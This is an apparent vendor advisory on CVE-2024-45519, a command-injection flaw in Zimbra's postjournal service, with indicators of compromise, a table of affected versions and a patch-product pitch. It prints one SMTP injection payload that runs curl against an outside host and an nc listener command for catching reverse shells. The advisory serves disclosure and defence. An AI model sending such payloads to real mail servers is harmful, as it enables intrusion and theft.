Zimbra has issued an advisory regarding a critical vulnerability identified as CVE-2024-45519, found in its postjournal service. This flaw has been classified as having a high severity level, allowing unauthenticated users to execute arbitrary commands on vulnerable systems. The vulnerability was first reported by ProjectDiscovery, which disclosed a proof-of-concept (PoC) exploit, indicating that the flaw is actively being exploited in real-world attacks.
An effective patch management tool will prevent such attacks in the first place and keeps your IT secure.
The Nature of the Vulnerability
CVE-2024-45519 is a Remote Code Execution (RCE) vulnerability located in the postjournal service of Zimbra Collaboration Suite, which is responsible for processing and recording email communications. The vulnerability originates in the read_maps function, where user input is inadequately sanitized before being passed to the popen function. This lack of input validation allows attackers to inject arbitrary commands into the command execution context of the server.
Technical Breakdown
Input Sanitization Failure: The vulnerability arises when user-supplied data, such as email addresses or other SMTP fields, are directly incorporated into command strings without sufficient sanitization. This oversight means that malicious actors can craft specific inputs that manipulate how commands are executed on the server.
Command Injection via SMTP: Attackers exploit this flaw by sending specially crafted SMTP messages designed to bypass input validation. For example, an attacker could send an email with a command embedded within the recipient address:
In the below case, ${IFS} represents an internal field separator that allows for command chaining in Unix-like systems.
RCPT TO: <“aabbb$(curl${IFS}oast.me)”@mail.domain.com>
Execution Context: When the postjournal service processes these SMTP messages, it executes the command as if it were a legitimate request. This can lead to full server compromise, allowing attackers to install web shells or execute further commands with elevated privileges.
Lateral Movement and Data Exfiltration: Once an attacker gains control over a vulnerable Zimbra server, they can leverage this access to steal sensitive data, install persistent backdoors, or move laterally within the network to target other systems.
Public Exploit Availability: Following the initial disclosure by ProjectDiscovery, a PoC exploit script was released on GitHub. This script automates the process of exploiting vulnerable SMTP servers by establishing a reverse shell connection back to the attacker’s machine:
The command ‘nc -lvnp 4444’ sets up a listener on port 4444 for incoming connections from compromised servers.
Indicators of Compromise
Administrators should monitor for several indicators that may suggest exploitation attempts:
Unusual entries in Zimbra logs located at /opt/zimbra/log/, particularly around email processing. Detection of base64-encoded strings in email headers that may indicate command injection attempts. Unauthorized changes or installations of web shells within server directories.
Affected Versions and Remediation
Version Affected Range Solution
Zimbra 8.8.15 Patch 46 and below Upgrade to Patch 46 or above
Zimbra 9.0.0 Patch 41 and below Upgrade to Patch 41 or above
Zimbra 10.0.9 All versions Upgrade to the latest version
Zimbra 10.1.1 All versions Upgrade to the latest version
The vulnerability was disclosed by security researcher Alan Li (lebr0nli), prompting an immediate response from Zimbra to patch the issue in early September 2024.
Updated Advisory: Exploited in the Wild
Initially, there were no known instances of exploitation; however, recent reports indicate that CVE-2024-45519 has been actively targeted by threat actors since September 28, 2024. These attacks involve sending crafted emails that exploit the vulnerability to execute commands on vulnerable servers. Security researchers have highlighted that attackers are using base64-encoded strings in email headers to trigger command execution on compromised systems.
Action Required
Due to the critical nature of CVE-2024-45519 and its active exploitation, organizations utilizing affected versions of Zimbra are strongly advised to upgrade immediately to protect their systems from potential attacks. SanerNow detects this vulnerability, and for those unable to apply patches promptly, it is recommended to disable the postjournal service as a temporary mitigation measure until updates can be effectively implemented.
Instantly Fix Risks with SanerNow Patch Management
SanerNow patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. SanerNow patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.
